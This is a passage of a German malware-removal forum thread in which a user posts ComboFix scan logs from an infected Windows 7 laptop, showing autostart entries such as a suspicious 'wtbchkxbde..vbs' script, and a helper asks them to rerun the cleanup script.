[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"mwlDaemon"="c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe" [BU]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ProgID]
@="FlashFactory.FlashFactory.1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="FlashFactory.FlashFactory"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Zeit der Fertigstellung: 2014-04-22  23:25:56
ComboFix-quarantined-files.txt  2014-04-22 21:25
ComboFix2.txt  2014-04-22 02:04
ComboFix3.txt  2014-04-20 23:42
.
Vor Suchlauf: 23 Verzeichnis(se), 32.350.367.744 Bytes frei
Nach Suchlauf: 24 Verzeichnis(se), 32.057.769.984 Bytes frei
.
- - End Of File - - 8ECA954279CF360DC980F7021F069CB9

Virus ist noch da

schrauber 23.04.2014 14:00

Ehm, hast Du das Script korrekt erstellt und ausgeführt? Sieht nicht so aus, oder es lief was schief. Bitte nochmal wiederholen.

fxak 23.04.2014 17:51

Liste der Anhänge anzeigen (Anzahl: 1)
neues combofix-log:
Code:

ComboFix 14-04-20.01 - Franz 23.04.2014  18:03:09.5.4 - x64
Microsoft Windows 7 Home Premium  6.1.7600.0.1252.49.1031.18.3764.1917 [GMT 2:00]
ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe
Benutzte Befehlsschalter :: c:\users\Franz\Desktop\CFScript.txt
AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859}
SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
(((((((((((((((((((((((  Dateien erstellt von 2014-03-23 bis 2014-04-23  ))))))))))))))))))))))))))))))
.
.
2014-04-23 16:16 . 2014-04-23 16:16        --------        d-----w-        c:\users\Default\AppData\Local\temp
2014-04-22 00:40 . 2014-04-22 15:13        --------        d-----w-        c:\program files (x86)\Smadav
2014-04-22 00:40 . 2014-04-22 00:40        --------        d-----w-        c:\users\Franz\AppData\Roaming\Smadav
2014-04-18 21:16 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-04-18 21:14 . 2013-09-22 15:47        73266        ----a-w-        c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs
2014-04-16 21:46 . 2014-04-16 21:46        --------        d-----w-        c:\windows\ERUNT
2014-04-16 21:07 . 2014-04-16 21:10        119512        ----a-w-        c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\program files (x86)\Malwarebytes Anti-Malware
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\programdata\Malwarebytes
2014-04-16 21:06 . 2014-04-03 07:51        63192        ----a-w-        c:\windows\system32\drivers\mwac.sys
2014-04-16 21:06 . 2014-04-03 07:51        88280        ----a-w-        c:\windows\system32\drivers\mbamchameleon.sys
2014-04-16 21:06 . 2014-04-03 07:50        25816        ----a-w-        c:\windows\system32\drivers\mbam.sys
2014-04-16 21:06 . 2014-04-16 21:06        --------        d-----w-        c:\users\Franz\AppData\Local\Programs
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\programdata\Panda Security
2014-04-16 00:52 . 2014-04-16 00:52        --------        d-----w-        c:\program files (x86)\Panda USB Vaccine
2014-04-14 08:43 . 2014-04-20 03:21        --------        d-----w-        C:\FRST
2014-04-07 07:32 . 2014-04-22 02:41        --------        d-----w-        C:\[Smad-Cage]
2014-04-07 07:30 . 2014-04-07 07:30        --------        d-----w-        c:\programdata\Kaspersky Lab Setup Files
2014-04-02 06:19 . 2014-04-02 06:54        --------        d-----w-        c:\users\Franz\AppData\Local\NPE
2014-04-02 06:19 . 2014-04-02 06:19        --------        d-----w-        c:\programdata\Norton
2014-03-25 07:40 . 2014-03-25 07:40        --------        d-----w-        C:\found.001
.
.
.
((((((((((((((((((((((((((((((((((((  Find3M Bericht  ))))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-03-04 12:17 . 2012-07-17 13:37        22240        ----a-w-        c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
.
.
((((((((((((((((((((((((((((  Autostartpunkte der Registrierung  ))))))))))))))))))))))))))))))))))))))))
.
.
*Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt.
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        131248        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208]
"wtbchkxbde"="wscript.exe" [2009-07-14 141824]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304]
"LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080]
"APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848]
"avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744]
"HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208]
"iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392]
.
c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
wtbchkxbde..vbs [2013-9-22 73266]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032]
VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x]
R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x]
R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x]
R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x]
R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x]
R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x]
R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x]
R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x]
S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x]
S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x]
S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x]
S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x]
S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x]
S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x]
S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x]
S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x]
S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x]
S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x]
S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x]
S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x]
S3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
.
.
--- Andere Dienste/Treiber im Speicher ---
.
*NewlyCreated* - 44255850
*Deregistered* - 44255850
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-04-23 15:56        1077576        ----a-w-        c:\program files (x86)\Google\Chrome\Application\34.0.1847.116\Installer\chrmstp.exe
.
Inhalt des "geplante Tasks" Ordners
.
2014-04-23 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
2014-04-23 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54        164016        ----a-w-        c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"mwlDaemon"="c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe" [BU]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.10"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx, 1"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Macromedia Flash Factory Object"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\Flash10e.ocx"
"ThreadingModel"="Apartment"
.
